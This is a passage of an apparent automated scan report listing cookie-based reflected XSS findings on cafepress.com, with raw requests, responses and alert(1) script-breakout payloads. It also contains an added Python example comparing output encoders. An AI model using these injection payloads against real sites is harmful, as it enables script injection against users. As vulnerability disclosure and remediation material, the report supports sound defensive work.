window.cafepress...[SNIP]...
1.2. http://www.cafepress.com/ [cp-v cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc0ca"-alert(1)-"bbefee824fc was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAcc0ca"-alert(1)-"bbefee824fc ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 75201 Date: Sun, 26 Dec 2010 13:46:49 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 75201 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAcc0ca"-alert(1)-"bbefee824fc "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.3. http://www.cafepress.com/ [cp_st cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adbea</script><script>alert(1)</script>c2b3851b0e4 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=adbea</script><script>alert(1)</script>c2b3851b0e4 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; 
__cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 75223 Date: Sun, 26 Dec 2010 13:46:46 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 75223 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... n_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'HomePage' window.cafepress.tealeaf.searchTerm = 'adbea</script><script>alert(1)</script>c2b3851b0e4 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
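The findings 1.2 through 1.9 all reduce to one defect with two faces: a cookie value is concatenated into an inline script, once inside a double-quoted string (`s.eVar30 = "..."`, broken out of with `"-alert(1)-"`) and once inside a single-quoted string (`window.cafepress.tealeaf.searchTerm = '...'`, broken out of with `</script><script>alert(1)</script>`). The second shape matters for the remediation: the HTML tokenizer ends the script element at the first `</script` before the JavaScript parser ever runs, so escaping quotes alone does not help. The following is an added example, not code from the XSS.CX report or from CafePress. The two template lines are hypothetical stand-ins modelled on the captured responses; the real ASP.NET code that produces them is not on the page. It renders the same script with three encoders (none, quote-only, full `\uXXXX` JavaScript-string encoding) and includes the context check a scanner performs, so the reader can see which payload each encoder stops.

```python
"""Added example, not code from the XSS.CX report or from CafePress.

The inline-script lines below are hypothetical stand-ins modelled on the
captured responses (s.eVar30 = "..." and window.cafepress.tealeaf.searchTerm = '...');
the real ASP.NET code that produces them is not on the page.
"""

# Payload shapes from the report: the first breaks out of a double-quoted JS string,
# the second closes the whole <script> element from inside a single-quoted string.
DQ_PAYLOAD = 'cc0ca"-alert(1)-"bbefee824fc'
SCRIPT_BREAK_PAYLOAD = 'adbea</script><script>alert(1)</script>c2b3851b0e4'
EVAR_PREFIX = 'A8D8655B7B25F13535D4E6E67BEC27E9:'   # constant seen in the captures


def render_vulnerable(cp_v: str, cp_st: str) -> str:
    """Cookie values concatenated raw into script text, as the captures show."""
    return ('<script>\n'
            f's.eVar30 = "{EVAR_PREFIX}{cp_v}";\n'
            f"window.cafepress.tealeaf.searchTerm = '{cp_st}'\n"
            '</script>')


def naive_escape(value: str) -> str:
    """Backslash-escapes quotes only. Stops the "-alert(1)-" shape but NOT
    </script>, because the HTML parser ends the script element before the
    JavaScript parser ever sees the string literal."""
    return value.replace('\\', '\\\\').replace('"', '\\"').replace("'", "\\'")


def js_string_encode(value: str) -> str:
    """Encode untrusted data for a JavaScript string literal: every character
    outside [A-Za-z0-9] becomes \\uXXXX, so quotes, backslashes, '<', '>' and
    '/' can neither end the string nor spell '</script>' for the HTML parser."""
    out = []
    for ch in value:
        cp = ord(ch)
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif cp > 0xFFFF:                      # astral code point: surrogate pair
            cp -= 0x10000
            out.append(f'\\u{0xD800 + (cp >> 10):04x}\\u{0xDC00 + (cp & 0x3FF):04x}')
        else:
            out.append(f'\\u{cp:04x}')
    return ''.join(out)


def render_with(encoder, cp_v: str, cp_st: str) -> str:
    """Same template, with both cookie values passed through `encoder` first."""
    return render_vulnerable(encoder(cp_v), encoder(cp_st))


def reflection_context(body: str, payload: str) -> str:
    """Classify the first raw reflection of `payload`: 'none', 'html',
    'script' (bare JS), 'script-string-dq' or 'script-string-sq'.
    This is the check the scanner performed: an unmodified echo in script context."""
    pos = body.find(payload)
    if pos < 0:
        return 'none'
    low = body.lower()
    open_at = low.rfind('<script', 0, pos)
    # The HTML tokenizer ends a script element at the first '</script', so a
    # close tag between the open tag and the reflection means HTML context.
    if open_at < 0 or low.rfind('</script', open_at, pos) >= 0:
        return 'html'
    script_text = body[body.find('>', open_at) + 1:pos]
    quote = None                               # minimal JS string-state scan
    i = 0
    while i < len(script_text):
        ch = script_text[i]
        if ch == '\\':                         # skip the escaped character
            i += 2
            continue
        if quote is None and ch in '"\'':
            quote = ch
        elif ch == quote:
            quote = None
        i += 1
    return {None: 'script', '"': 'script-string-dq', "'": 'script-string-sq'}[quote]


def breaks_out(body: str, payload: str) -> bool:
    """True when the reflected payload escapes its JS string or the script element."""
    ctx = reflection_context(body, payload)
    if not ctx.startswith('script'):
        return False
    if '</script' in payload.lower():
        return True
    return (ctx == 'script-string-dq' and '"' in payload) or \
           (ctx == 'script-string-sq' and "'" in payload)


if __name__ == '__main__':
    legit = 'D0026F27AADDAF9A26C54608326FC1BA'   # cp-v value from the captures
    for name, enc in (('raw', lambda v: v), ('naive', naive_escape), ('js', js_string_encode)):
        body = render_with(enc, legit + DQ_PAYLOAD, SCRIPT_BREAK_PAYLOAD)
        print(name, breaks_out(body, DQ_PAYLOAD), breaks_out(body, SCRIPT_BREAK_PAYLOAD))
```

Running the block prints `raw True True`, `naive False True`, `js False False`: quote-escaping alone leaves every `cp_st` finding in this report exploitable, while full JavaScript-string encoding closes both shapes. On the .NET 4 runtime the equivalent encoder is `HttpUtility.JavaScriptStringEncode`; the server here reports `X-AspNet-Version: 2.0.50727`, where a library encoder has to supply it. Encoding the value is still second-best to the report's own advice of not placing cookie data in script at all, for example by exposing it through a `data-` attribute read by script.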
1.4. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 [cp-v cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e15e"-alert(1)-"05104e4ef1f was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; 
__cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA1e15e"-alert(1)-"05104e4ef1f ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW19 Cteonnt-Length: 93201 Date: Sun, 26 Dec 2010 13:46:53 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 93201 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA1e15e"-alert(1)-"05104e4ef1f "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.5. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 [cp_st cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2434e</script><script>alert(1)</script>da77cba4a3a was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability. Two details in the captured response below qualify that limitation. First, the application itself issues Set-Cookie: cp_st= with a value that differs from the one submitted, so cp_st is written server-side from some other input (the script variable it lands in is named searchTerm); if that input can be supplied in a request, no cookie-setting step is needed. This report does not test that. Second, cp_st is scoped with domain=cafepress.com, so it can be set or overwritten from any host under that domain, not only www, and the ASP.NET_SessionId cookie in the same response is set without the HttpOnly flag, so any script that does execute can read the session identifier.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=2434e</script><script>alert(1)</script>da77cba4a3a ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 Cteonnt-Length: 93261 Date: Sun, 26 Dec 2010 13:46:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=49f12%00%0d%0a462543dabee; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:51 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:51 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 93261 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'ProductDetails' window.cafepress.tealeaf.searchTerm = '2434e</script><script>alert(1)</script>da77cba4a3a ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.6. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536 [cp-v cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5445"-alert(1)-"653f5650114 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+Eat+Sleep+Game+Light+T-Shirt%2C299007536 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; 